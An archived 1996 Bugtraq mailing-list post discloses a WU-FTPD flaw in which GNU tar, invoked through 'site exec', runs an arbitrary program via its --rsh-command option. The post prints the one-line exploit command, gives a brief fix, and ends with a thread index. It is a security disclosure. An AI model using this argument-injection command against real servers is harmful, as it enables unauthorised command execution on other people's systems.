Bugtraq mailing list archives

WU.FTPD vulnerability: gnu tar possibly others

From: coxa () cableol net (Alan Cox)
Date: Mon, 19 Aug 1996 14:09:19 +0100


quote site exec tar  -c -v --rsh-command=commandtorunasftp -f somebox:foo foo

Gnu tar allows you to specify which binary you wish to run.

Fix:
        Use a dumber tar. Also carefully evaluate any other binaries
you have to avoid unpleasant and similar suprises.

Current thread:

Re: libresolv, (continued)
- - - Re: libresolv Xarthon (Aug 18)
    - Re: libresolv+ bug Nelson Murilo (Aug 18)
    - Re: libresolv+ bug Brian Mitchell (Aug 18)
    - Re: libresolv+ bug Casper Dik (Aug 19)
    - Re: libresolv+ bug Alan Cox (Aug 19)
    - Re: libresolv+ bug Brian Mitchell (Aug 19)
    - Re: libresolv+ bug David Holland (Aug 19)
    - Re: libresolv+ bug Alan Cox (Aug 19)
    - Re: libresolv+ bug Steve Czetty (Aug 19)
    - real time decode of tcpdump output Michael Ryan (Aug 19)
    - WU.FTPD vulnerability: gnu tar possibly others Alan Cox (Aug 19)
    - Re: WU.FTPD vulnerability: gnu tar possibly others Pedro Melo (Aug 19)
    - Re: WU.FTPD vulnerability: gnu tar possibly others Christian Limpach (Aug 19)
    - SECURITY FIX/UPDATE: anonftp Elliot Lee (Aug 19)
    - Re: Possible bufferoverflow condition in lpr, xterm and xload Igor Chudov @ home (Aug 18)
    - Re: Possible bufferoverflow condition in lpr, xterm and xload Evil Pete (Aug 18)
    - CERT Advisory CA-96.18 - Vulnerability in fm_fls CERT Advisory (Aug 14)
    - Re: Possible bufferoverflow condition in lpr, xterm and xload Ficus Kirkpatrick (Aug 13)
    - Re: Possible bufferoverflow condition in lpr, xterm and xload Alexander O. Yuriev (Aug 14)
    - Tracking tools? David Miller (Aug 14)
    - Re: Tracking tools? Gene Titus (Aug 15)

(Thread continues...)